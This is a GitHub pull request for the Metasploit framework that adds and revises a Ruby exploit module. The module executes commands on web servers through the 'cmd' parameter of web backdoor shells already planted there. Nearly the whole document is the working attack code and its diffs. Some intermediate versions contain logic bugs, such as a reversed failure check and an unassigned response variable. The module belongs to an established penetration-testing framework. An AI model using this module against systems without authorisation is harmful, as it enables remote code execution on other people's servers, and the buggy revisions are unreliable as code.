### PR TITLE
Simple Backdoor Shell Remote Code Execution

### DIFF
--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     test = "echo me"
-    shell = send_request_cgi({
+    res = send_request_cgi({
       'method'  => 'POST',
       'uri'             => normalize_uri(target_uri.path.to_s),
       'vars_post'       =>
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'cmd' => test
         }
     })
-    if (shell and shell.body =~ /echo me/)
+    if res and res.body =~ /echo me/
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -59,9 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
   def check
     test = 'echo me'
     res = send_request_cgi({
-      'method'  => 'POST',
+      'method'  => 'GET',
       'uri'             => normalize_uri(target_uri.path),
-      'vars_post'       =>
+      'vars_get'       =>
         {
           'cmd' => test
         }

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'cmd' => cmd
       }
     })
-    if not (res and res.code == 200)
+    if not res and res.code == 200
       fail_with(Failure::Unknown, 'Failed to execute the command.')
     end
   end

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    test = 'echo me'
+    test = Rex::Text.rand_text_alpha(8)
     res = send_request_cgi({
       'method'  => 'GET',
       'uri'             => normalize_uri(target_uri.path),
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'cmd' => test
         }
     })
-    if res && res.body =~ /echo me/
+    if res && res.body =~ /#{test}/
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'Simple Backdoor Shell Remote Code Execution',
       'Description'    => %q{
           This module exploits unauthenticated simple web backdoor shells by leveraging the
-        common backdoor shells' CMD parameter  to execute commands. The SecLists project of
-        Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
-        which are categorized under Payloads.
+        common backdoor shell's CMD parameter  to execute commands. The SecLists project of
+        Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells
+        which is categorized under Payloads.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -58,15 +58,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     test = "echo me"
-    request_parameters = {
-      'method'	=> 'POST',
-      'uri'		=> normalize_uri(target_uri.path.to_s),
-      'vars_post'	=>
+    shell = send_request_cgi({
+      'method'  => 'POST',
+      'uri'             => normalize_uri(target_uri.path.to_s),
+      'vars_post'       =>
         {
           'cmd' => test
         }
-    }
-    shell = send_request_cgi(request_parameters)
+    })
     if (shell and shell.body =~ /echo me/)
       return Exploit::CheckCode::Vulnerable
     end

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'Simple Backdoor Shell Remote Code Execution',
       'Description'    => %q{
           This module exploits unauthenticated simple web backdoor shells by leveraging the
-        common backdoor shell's CMD parameter  to execute commands. The SecLists project of
-        Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells
-        which is categorized under Payloads.
+        common backdoor shells' CMD parameter  to execute commands. The SecLists project of
+        Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
+        which are categorized under Payloads.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -52,21 +52,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, "The path of a backdoor shell", "/cmd.php"]),
+        OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),
       ],self.class)
   end
 
   def check
-    test = "echo me"
+    test = 'echo me'
     res = send_request_cgi({
       'method'  => 'POST',
-      'uri'             => normalize_uri(target_uri.path.to_s),
+      'uri'             => normalize_uri(target_uri.path),
       'vars_post'       =>
         {
           'cmd' => test
         }
     })
-    if res and res.body =~ /echo me/
+    if res && res.body =~ /echo me/
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
@@ -75,12 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote
   def http_send_command(cmd)
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path.to_s),
+      'uri'      => normalize_uri(target_uri.path),
       'vars_get' => {
         'cmd' => cmd
       }
     })
-    if not res and res.code == 200
+    if !res && res.code == 200
       fail_with(Failure::Unknown, 'Failed to execute the command.')
     end
   end

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -81,7 +81,9 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
     if !res && res.code == 200
-      fail_with(Failure::Unknown, 'Failed to execute the command.')
+      fail_with(Failure::Unknown, "Failed to execute the command.")
+    else
+      fail_with(Failure::Unknown, "#{res.code} #{res.message}")
     end
   end
 

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -1,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Simple Backdoor Shell Remote Code Execution',
+      'Description'    => %q{
+          This module exploits unauthenticated simple web backdoor shells by leveraging the
+        common backdoor shell's CMD parameter  to execute commands. The SecLists project of
+        Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells
+        which is categorized under Payloads.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jay Turla <@shipcod3>',
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://resources.infosecinstitute.com/checking-out-backdoor-shells/' ],
+          [ 'URL', 'https://github.com/danielmiessler/SecLists/tree/master/Payloads' ] # Most PHP Web Backdoors Listed
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 2000,
+          'BadChars' => '',
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['backdoor / Unix', { 'Platform' => 'unix' } ],
+          ['backdoor / Windows', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => 'Sep 08 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The path of a backdoor shell", "/cmd.php"]),
+      ],self.class)
+  end
+
+  def check
+    test = "echo me"
+    request_parameters = {
+      'method'	=> 'POST',
+      'uri'		=> normalize_uri(target_uri.path.to_s),
+      'vars_post'	=>
+        {
+          'cmd' => test
+        }
+    }
+    shell = send_request_cgi(request_parameters)
+    if (shell and shell.body =~ /echo me/)
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def http_send_command(cmd)
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path.to_s),
+      'vars_get' => {
+        'cmd' => cmd
+      }
+    })
+    if not (res and res.code == 200)
+      fail_with(Failure::Unknown, 'Failed to execute the command.')
+    end
+  end
+
+  def exploit
+    http_send_command(payload.encoded)
+  end
+end

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Simple Backdoor Shell Remote Code Execution',
       'Description'    => %q{
-          This module exploits unauthenticated simple web backdoor shells by leveraging the
+        This module exploits unauthenticated simple web backdoor shells by leveraging the
         common backdoor shell's CMD parameter  to execute commands. The SecLists project of
         Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells
         which is categorized under Payloads.

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -58,14 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     test = Rex::Text.rand_text_alpha(8)
-    res = send_request_cgi({
-      'method'  => 'GET',
-      'uri'             => normalize_uri(target_uri.path),
-      'vars_get'       =>
-        {
-          'cmd' => test
-        }
-    })
+    http_send_command(test)
     if res && res.body =~ /#{test}/
       return Exploit::CheckCode::Vulnerable
     end
@@ -80,9 +73,10 @@ class Metasploit3 < Msf::Exploit::Remote
         'cmd' => cmd
       }
     })
-    if !res && res.code == 200
+    unless res && res.code == 200
       fail_with(Failure::Unknown, "Failed to execute the command.")
     end
+    res
   end
 
   def exploit

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Jay Turla <@shipcod3>', 
+          'Jay Turla <@shipcod3>',
         ],
       'References'     =>
         [

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -16,13 +16,13 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits unauthenticated simple web backdoor shells by leveraging the
         common backdoor shell's CMD parameter  to execute commands. The SecLists project of
-        Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells
+        Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
         which is categorized under Payloads.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Jay Turla <@shipcod3>',
+          'Jay Turla <@shipcod3>', 
         ],
       'References'     =>
         [

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -82,8 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
     })
     if !res && res.code == 200
       fail_with(Failure::Unknown, "Failed to execute the command.")
-    else
-      fail_with(Failure::Unknown, "#{res.code} #{res.message}")
     end
   end
 


### PR DESCRIPTION
This module exploits unauthenticated simple web backdoor shells by leveraging the common backdoor shell's CMD parameter to execute commands. The SecLists project of Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells which are categorized under Payloads.

Common Backdoor Shells: https://github.com/danielmiessler/SecLists/tree/master/Payloads

![image](https://cloud.githubusercontent.com/assets/3483615/9726878/2a95ce7c-562b-11e5-8d5b-816cf26415b8.png)

![image](https://cloud.githubusercontent.com/assets/3483615/9726867/10a9363e-562b-11e5-8394-bffda06afbaa.png)
